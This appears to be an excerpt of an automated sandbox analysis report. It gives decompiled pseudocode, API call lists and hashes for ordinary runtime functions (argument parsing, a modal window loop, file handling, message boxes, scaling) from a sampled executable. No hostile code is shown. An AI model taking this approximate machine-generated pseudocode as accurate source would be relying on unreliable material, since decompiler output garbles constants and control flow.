                                                    0x00000000
                                                    0x00000000
                                                    0x00402aee
                                                    0x00402aee
                                                    0x00402af0
                                                    0x00402af3
                                                    0x00402af4
                                                    0x00402af5
                                                    0x00000000
                                                    0x00402aee
                                                    0x00402ab2
                                                    0x00402acb
                                                    0x00402acb
                                                    0x00402acf
                                                    0x00000000
                                                    0x00000000
                                                    0x00402ab7
                                                    0x00402abe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00402ac0
                                                    0x00402ac0
                                                    0x00402ac2
                                                    0x00402ac5
                                                    0x00402ac6
                                                    0x00402ac7
                                                    0x00402ac0
                                                    0x00402ad8
                                                    0x00402ae0
                                                    0x00402ae0
                                                    0x00402ad8
                                                    0x00402b05
                                                    0x00402a43
                                                    0x00402a43
                                                    0x00000000
                                                    0x00402a43
                                                    0x00402a3b

                                                    APIs
                                                    • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A53
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A5D
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A7A
                                                    • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A84
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AAD
                                                    • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AB7
                                                    • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402ADB
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AE5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharNext
                                                    • String ID: "$"
                                                    • API String ID: 3213498283-3758156766
                                                    • Opcode ID: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                    • Instruction ID: 7f4eabc370d0c2b1a65279813ceea620399496a62879659d683f8910f88fef49
                                                    • Opcode Fuzzy Hash: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                    • Instruction Fuzzy Hash: 3621E5447443D21ADF7169B90EC83A76B894B5A31872804BB9582B63CBDCFC48479B6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00457244 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 144windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E00457244(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t90;
				intOrPtr _t122;
				void* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t129;

				_t125 = __esi;
				_t124 = __edi;
				_t105 = __ebx;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x45750c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				E004397DC();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x49da70; // 0x422f48
					E00406A70(_t50,  &_v36);
					E0040D144(_v36, 1);
					E00404378();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t56 =  *0x49ebb8; // 0x0
				E004596E4(_t56);
				_push(_t127);
				_push(0x4574ef);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t60 =  *0x49be70; // 0x0
				_v20 = _t60;
				_t61 =  *0x49ebbc; // 0x0
				_t62 =  *0x49ebbc; // 0x0
				E0041ACE8( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t65 =  *0x49ebbc; // 0x0
				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
				_t66 =  *0x49ebbc; // 0x0
				_v22 =  *((intOrPtr*)(_t66 + 0x44));
				_t68 =  *0x49ebbc; // 0x0
				E00458714(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t70 =  *0x49ebbc; // 0x0
				_v28 =  *((intOrPtr*)(_t70 + 0x48));
				_v16 = E00451600(0, _t105, _t124, _t125);
				_push(_t127);
				_push(0x4574cd);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				E00457194(_v8);
				_push(_t127);
				_push(0x45742c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				SendMessageA(E00441704(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t80 =  *0x49ebb8; // 0x0
					E0045A580(_t80, _t124, _t125);
					_t82 =  *0x49ebb8; // 0x0
					if( *((char*)(_t82 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E004570F4(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t85 == 0);
				_v12 = _t85;
				SendMessageA(E00441704(_v8), 0xb001, 0, 0);
				_t90 = E00441704(_v8);
				if(_t90 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(0x457433);
				return E0045718C();
			}





























                                                    0x00457244
                                                    0x00457244
                                                    0x00457244
                                                    0x00457245
                                                    0x00457247
                                                    0x0045724a
                                                    0x0045724b
                                                    0x0045724e
                                                    0x00457251
                                                    0x00457256
                                                    0x00457257
                                                    0x0045725c
                                                    0x0045725f
                                                    0x00457262
                                                    0x0045726e
                                                    0x00457297
                                                    0x0045729c
                                                    0x004572ab
                                                    0x004572b0
                                                    0x004572b0
                                                    0x004572bc
                                                    0x004572ca
                                                    0x004572ca
                                                    0x004572cf
                                                    0x004572d4
                                                    0x004572d9
                                                    0x004572e0
                                                    0x004572e1
                                                    0x004572e6
                                                    0x004572e9
                                                    0x004572ef
                                                    0x004572fb
                                                    0x004572fe
                                                    0x00457303
                                                    0x00457306
                                                    0x0045730e
                                                    0x00457318
                                                    0x0045731d
                                                    0x00457325
                                                    0x00457328
                                                    0x00457331
                                                    0x00457337
                                                    0x0045733c
                                                    0x00457341
                                                    0x00457349
                                                    0x00457353
                                                    0x00457358
                                                    0x00457359
                                                    0x0045735e
                                                    0x00457361
                                                    0x00457367
                                                    0x0045736e
                                                    0x0045736f
                                                    0x00457374
                                                    0x00457377
                                                    0x0045738c
                                                    0x00457396
                                                    0x0045739c
                                                    0x0045739c
                                                    0x004573a1
                                                    0x004573a6
                                                    0x004573b2
                                                    0x004573cd
                                                    0x004573d2
                                                    0x004573d2
                                                    0x004573b4
                                                    0x004573b7
                                                    0x004573b7
                                                    0x004573da
                                                    0x004573e0
                                                    0x004573e4
                                                    0x004573f9
                                                    0x00457401
                                                    0x0045740f
                                                    0x00457413
                                                    0x00457413
                                                    0x00457418
                                                    0x0045741b
                                                    0x0045741e
                                                    0x0045742b

                                                    APIs
                                                    • GetCapture.USER32 ref: 004572B5
                                                    • GetCapture.USER32 ref: 004572C4
                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004572CA
                                                    • ReleaseCapture.USER32(00000000,0045750C), ref: 004572CF
                                                    • GetActiveWindow.USER32 ref: 004572F6
                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0045738C
                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 004573F9
                                                    • GetActiveWindow.USER32 ref: 00457408
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                    • String ID: H/B
                                                    • API String ID: 862346643-184950203
                                                    • Opcode ID: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                    • Instruction ID: 07b1c62a38d4c59f35ab2a161c95611ba83c65b292c9824363ed57e20a3288b5
                                                    • Opcode Fuzzy Hash: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                    • Instruction Fuzzy Hash: 19512E34A04244EFDB10EF6AD946F9A77F1EB49704F1580BAF800A73A2D778AD44DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402D70 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E00402D70(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402cc4;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402D04;
				}
				_t59[9] = E00402D50;
				_t59[8] = E00402D00;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402D00;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x49e3e8) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402D04;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                    0x00402d71
                                                    0x00402d75
                                                    0x00402d78
                                                    0x00402d84
                                                    0x00402d91
                                                    0x00402d96
                                                    0x00402d9b
                                                    0x00402da0
                                                    0x00402d86
                                                    0x00402d87
                                                    0x00402da9
                                                    0x00402dae
                                                    0x00402db3
                                                    0x00402d89
                                                    0x00402d8a
                                                    0x00000000
                                                    0x00000000
                                                    0x00402dba
                                                    0x00402dbf
                                                    0x00402dc4
                                                    0x00402dc4
                                                    0x00402dc9
                                                    0x00402dc9
                                                    0x00402dd0
                                                    0x00402dd7
                                                    0x00402de2
                                                    0x00402ea0
                                                    0x00402ea7
                                                    0x00402eae
                                                    0x00402eb7
                                                    0x00402ec3
                                                    0x00402ec9
                                                    0x00402ec5
                                                    0x00402ec5
                                                    0x00402ec5
                                                    0x00402eb9
                                                    0x00402eb9
                                                    0x00402eb9
                                                    0x00402ecb
                                                    0x00402ed3
                                                    0x00000000
                                                    0x00000000
                                                    0x00402ed5
                                                    0x00000000
                                                    0x00402de8
                                                    0x00402df8
                                                    0x00402e00
                                                    0x00402f0e
                                                    0x00402f0e
                                                    0x00000000
                                                    0x00402f14
                                                    0x00402e06
                                                    0x00402e0e
                                                    0x00402ed7
                                                    0x00402edd
                                                    0x00402ef6
                                                    0x00000000
                                                    0x00402ef6
                                                    0x00402ee1
                                                    0x00402ee8
                                                    0x00402efc
                                                    0x00402f01
                                                    0x00000000
                                                    0x00402f07
                                                    0x00402eed
                                                    0x00402eef
                                                    0x00402eef
                                                    0x00000000
                                                    0x00402eed
                                                    0x00402e14
                                                    0x00402e21
                                                    0x00402e22
                                                    0x00000000
                                                    0x00000000
                                                    0x00402e28
                                                    0x00402e2d
                                                    0x00402e2f
                                                    0x00402e2f
                                                    0x00402e3e
                                                    0x00000000
                                                    0x00402e44
                                                    0x00402e59
                                                    0x00402e5e
                                                    0x00402e60
                                                    0x00000000
                                                    0x00000000
                                                    0x00402e66
                                                    0x00402e68
                                                    0x00402e74
                                                    0x00402e88
                                                    0x00000000
                                                    0x00402e98
                                                    0x00000000
                                                    0x00402e98
                                                    0x00402e88
                                                    0x00402e76
                                                    0x00402e76
                                                    0x00000000
                                                    0x00402e68
                                                    0x00402e3e

                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E38
                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402E59
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402E90
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402ECB
                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00402EE1
                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402EFC
                                                    • GetLastError.KERNEL32(000000F5), ref: 00402F14
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                    • String ID:
                                                    • API String ID: 1694776339-0
                                                    • Opcode ID: 8861dfc536feb275602d3633a0ce4d7dcd0f803c1f99ce0a386a22b5fd57de5a
                                                    • Instruction ID: 9aa9312da4e91c771af0b4e33a38407941ada986436eec9a0907e2913daab745
                                                    • Opcode Fuzzy Hash: 8861dfc536feb275602d3633a0ce4d7dcd0f803c1f99ce0a386a22b5fd57de5a
                                                    • Instruction Fuzzy Hash: 31418C30140701AAE730AF24CA4DB6775A5AF00754F208E3FE5A6BA6E0D7FD9841979D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040D058 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56filewindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040D058(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040CED0(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x49dc84; // 0x49e04c
				if( *_t14 == 0) {
					_t16 =  *0x49d864; // 0x407db4
					_t9 = _t16 + 4; // 0xffd2
					_t18 =  *0x49e668; // 0x400000
					LoadStringA(E00405FDC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x49d8f8; // 0x49e21c
				E004028C4(E00402FCC(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00409F88( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40d11c, 2,  &_v1092, 0);
			}












                                                    0x0040d067
                                                    0x0040d06c
                                                    0x0040d074
                                                    0x0040d0db
                                                    0x0040d0e0
                                                    0x0040d0e4
                                                    0x0040d0ef
                                                    0x00000000
                                                    0x0040d105
                                                    0x0040d076
                                                    0x0040d080
                                                    0x0040d08f
                                                    0x0040d09f
                                                    0x0040d0b2
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                      • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                      • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                      • Part of subcall function 0040CED0: LoadStringA.USER32 ref: 0040CFC2
                                                    • CharToOemA.USER32 ref: 0040D08F
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040D0AC
                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0B2
                                                    • GetStdHandle.KERNEL32(000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0C7
                                                    • WriteFile.KERNEL32(00000000,000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0CD
                                                    • LoadStringA.USER32 ref: 0040D0EF
                                                    • MessageBoxA.USER32 ref: 0040D105
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                    • String ID: LI
                                                    • API String ID: 185507032-1163166679
                                                    • Opcode ID: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                    • Instruction ID: 7d08aee67cafa4939384a0f732e453422e0e0597bbcbc481209cf698103cc48d
                                                    • Opcode Fuzzy Hash: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                    • Instruction Fuzzy Hash: AC119EB2948205BAD200F7A5CC86F8F77ECAB54304F40463BB754E60E2DA78E844876B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043AB98 Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0043AB98(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x43ad44; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x43ad3c; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x43ad44; // 0x0
				if(_t113 != (_t107 &  *0x43ad40)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x43ad44; // 0x0
				if(_t114 != (_t107 &  *0x43ad48)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E004250B0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425094( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                                    0x0043ab9f
                                                    0x0043aba2
                                                    0x0043aba4
                                                    0x0043aba9
                                                    0x0043ad26
                                                    0x0043ad26
                                                    0x0043ad2b
                                                    0x0043ad38
                                                    0x0043ad38
                                                    0x0043abb3
                                                    0x0043abbd
                                                    0x0043abb5
                                                    0x0043abb5
                                                    0x0043abb5
                                                    0x0043abc6
                                                    0x0043abda
                                                    0x0043abc8
                                                    0x0043abd6
                                                    0x0043abd6
                                                    0x0043abe0
                                                    0x0043abf9
                                                    0x0043abe2
                                                    0x0043abf0
                                                    0x0043abf0
                                                    0x0043ac00
                                                    0x0043ac3a
                                                    0x0043ac3d
                                                    0x0043ac08
                                                    0x0043ac0b
                                                    0x0043ac2f
                                                    0x0043ac34
                                                    0x0043ac0d
                                                    0x0043ac1e
                                                    0x0043ac20
                                                    0x0043ac20
                                                    0x0043ac0b
                                                    0x0043ac44
                                                    0x0043ac49
                                                    0x0043ac8d
                                                    0x0043ac51
                                                    0x0043ac59
                                                    0x0043ac84
                                                    0x0043ac5b
                                                    0x0043ac70
                                                    0x0043ac70
                                                    0x0043ac59
                                                    0x0043aca5
                                                    0x0043acb3
                                                    0x0043acbb
                                                    0x0043acce
                                                    0x0043acce
                                                    0x0043acdc
                                                    0x0043ace4
                                                    0x0043acf7
                                                    0x0043acf7
                                                    0x0043ad01
                                                    0x0043ad21
                                                    0x0043ad21
                                                    0x00000000

                                                    APIs
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043ABD1
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043ABEB
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC19
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC2F
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC67
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC7F
                                                    • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACC9
                                                    • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACF2
                                                    • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043AD18
                                                      • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                    • Instruction ID: d10f16ddfd9cc23340e03066ebc6cedff9c8bd4490aae9a17c26e6f9981b1e60
                                                    • Opcode Fuzzy Hash: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                    • Instruction Fuzzy Hash: C6518E70648744AFC320DB29C841B6BB7E9AF59304F04A81EB9D5C7792C63DEC508B1A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040E2E8 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E0040E2E8(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40e5b3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040E174();
				E0040CA14(__ebx, __edi, __esi);
				_t196 =  *0x49e750;
				if( *0x49e750 != 0) {
					E0040CBEC(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040C964(_t43, 0, 0x14,  &_v20);
				E00404A14(0x49e684, _v20);
				E0040C964(_t43, 0x40e5c8, 0x1b,  &_v24);
				 *0x49e688 = E00409664(0x40e5c8, 0, _t196);
				E0040C964(_t132, 0x40e5c8, 0x1c,  &_v28);
				 *0x49e689 = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68a = E0040C9B0(_t132, 0x2c, 0xf);
				 *0x49e68b = E0040C9B0(_t132, 0x2e, 0xe);
				E0040C964(_t132, 0x40e5c8, 0x19,  &_v32);
				 *0x49e68c = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68d = E0040C9B0(_t132, 0x2f, 0x1d);
